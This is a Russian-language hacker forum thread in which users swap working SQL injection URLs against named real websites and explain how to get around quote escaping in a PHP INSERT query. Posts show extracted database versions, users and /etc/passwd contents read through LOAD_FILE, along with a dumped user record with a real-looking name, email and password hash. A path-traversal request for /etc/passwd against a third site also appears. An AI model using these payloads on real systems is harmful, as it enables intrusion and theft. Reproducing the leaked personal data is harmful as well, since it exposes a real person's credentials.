Ваши вопросы по уязвимостям.

Функция заменяет кавычку на & # 3 9 ;
Если исходить из того кода что ты дал.

 

Здравствуйте, не примите за лапуха...но такую ошибку первый раз вижу

Code:

http://www.poetryclub.com.ua/author.php?id=2933%20union%20select%201%20--

HTML:

Database error: next_record called with no query pending. MySQL Error: () Session halted.

поля ордером перебирал

 

Загляни в html сорец странички (Вид - Исходный код страницы). Там все будет так как и должно быть.

 

Хз,что за ошибка,но посимвольный работает:

http://www.poetryclub.com.ua/author.php?id=2933+and+ascii(substring((select+version()),1,1))%3E=1/*

Обрати внимание на поле Опублiковано

 

Если кавычка превращается в хтмл сущность оной,пусть инезаметно для меня,то инжект нельзя провести ?

 

2 TELO
http://www.poetryclub.com.ua/author.php?id=2933+UNION+SELECT+CONCAT(0x3a,version(),database(),user())+LIMIT+1,1--

Database Version: 5.0.27
Database name: poetryclub
User name: vobushka@localhost

http://www.poetryclub.com.ua/author.php?id=2933+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764)+LIMIT+1,1--

# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh bla bla bla

 

Если кавчка заменяется html сущностями, то это уже не кавычка и ничего ты ею не сделаешь.

P.S. кстати скрипт бажный.

Слеши как я понял не экранируются, можно их заюзать:

* тут немного не правильно написал, см мой пост ниже.

Code:

mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());

к примеру:
$url = \
$email = cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email=(select version()), type=0; -- 1

Получиться:

Code:

mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='\', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email=(select version()), type=0; -- 1', type=0;") or die(mysql_error());

 

Чет я не догнал тему о слешах.Без них никак? Смотрю на твой пример и ничего не понимаю(кроме селект версион()

 

* в этой мессаге я тебе некоторые вещи цветом пометил.

Ну смотри переменная $ttitle - ей присваиваешь значение '\';
Т.е. слеш.

Code:

mysql_query("INSERT INTO main SET title='[COLOR=Red]$ttitle[/COLOR]', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());

Получается следующее:

Code:

mysql_query("INSERT INTO main SET title='[COLOR=Red]\[/COLOR]', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());

Т.е. он экранирует кавычку идущую после него.
Значит она не будет учавствовать в запросе и будет отображаться как текст, до следующей кавычки (в предыдущем примере я ошибся с $email):

Всё между этими кавычками - будет восприниматься как текст и будет значением колонки url.

Code:

mysql_query("INSERT INTO main SET title=[COLOR=Red]'[/COLOR]\', description=[COLOR=Red]'[/COLOR]$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());

Теперь ты можешь присвоить переменной $description значение и никакие кавычки тебе не помешают.
Предположим значение $description = ', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- '

В запросе будет следующее:

Code:

mysql_query("INSERT INTO main SET title='\', description=', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- ', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());

Отбросим лишее (то, что будет за комментировано):

Code:

mysql_query("INSERT INTO main SET title='\', description=', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- ") or die(mysql_error());

Далее объясню тебе как юзать такую инъекцию:

1. Или смотришь на то, что добавилось в поле email (если верить названию - оно где то должно отображаться).
2. Или юзаешь more than 1 row (ищи статью Електа).

P.S. А вообще вот тебе две статьи, милый, иди и изучай:

Атака на WEB. Миссия невыполнима - а там находишь "[ Фрагментированная SQL-inj ]"
more than 1 row

 

на некотором сайте, при подстановки ' выводится следующая ошибка: Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

подскажите, какая именно это уязвимость, к какой СУБД она относится?

 

mysql, есть возможность проведения sql инъекции. Преебирай число столбцов (+order+by+...), дальше, если версия не третья, то можно из Бд вытащит данные.

 

wildshaman, смотри, вот кажись подобрал, дальше пытаюсь вытащить юзеров, БД ну и т.д. Но сейчас не выодит ни ошибки ни инфу, которую я хотел бы .......

УРЛ скинул в личку, посмотри плиз...)

 

Если третья, то тоже можно, но немного сложнее.

 

Да, ошибся, там просто сложнее намного, с тройкой не привык еще работать

 

wildshaman, спасибо за помощь, но всё же хочется добить эту скулю.....
мною был слставлен следующий запрос для вывода имен таблиц: _http://www.comingsoon.net/news.php?id=1+union+select+table_name,2+from+information_schema.tables+where+table_schema=%27comingso_nextra%27

но к сожалению ничего хорошего я не увидел, подскажите, в чем ошибка.....

 

jecka3000, там переменная передается в несколько запросов, в которых количество столбцов для выборки разное. Это видно по ошибке

Но там так же двойной запрос (результат выборки одного передаются в другой), что мы можем использовать в своих гнусных целях

http://www.comingsoon.net/news.php?id=56269+and+1=2+union+select+(select+concat_ws(0x2F,name,email,password)+from+NEX_USERS+limit+0,1),2

Вывод в ошибке
Paul Oehler/[email protected]/$1$oXa15J8g$2idU4zZjHnXPyYDu94w2C0

UPDATE:

Там 4 версия - information_schema в ней нет

 

Я смотрю последнее время в теме тенденция всё усложнять. Двойные запросы неебические конструкции

http://www.comingsoon.net/news.php?id=99999999+union+select+concat_ws(0x2F,name,email,password),1+from+NEX_USERS+limit+0,1/*

 

Code:

http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

 

Pashkela и что ты нам показал?

 

Думаю этот смайл --> <-- как-бэ должен символизировать какой МОАшник бестолковый, и какие некомпетентные советы он даёт.

Pashkela
Если будет интересно ты просто своим "инклудом" почитай PHP скрипты на сайте. (Они отлично им читаются) и посмотри как это всё работает.

Это такой волшебный инклуд, он запросто читает php. Автор скрипта Девид Блейн, там сверху в копирайтах написано.

Grey: зачем ты тему палишь?) очень хотелось услышать от него, что такое инклуд в его понимание)
jokester : Spyder все равно всех сдал, уже 2 поста палева внизу, и это не предел!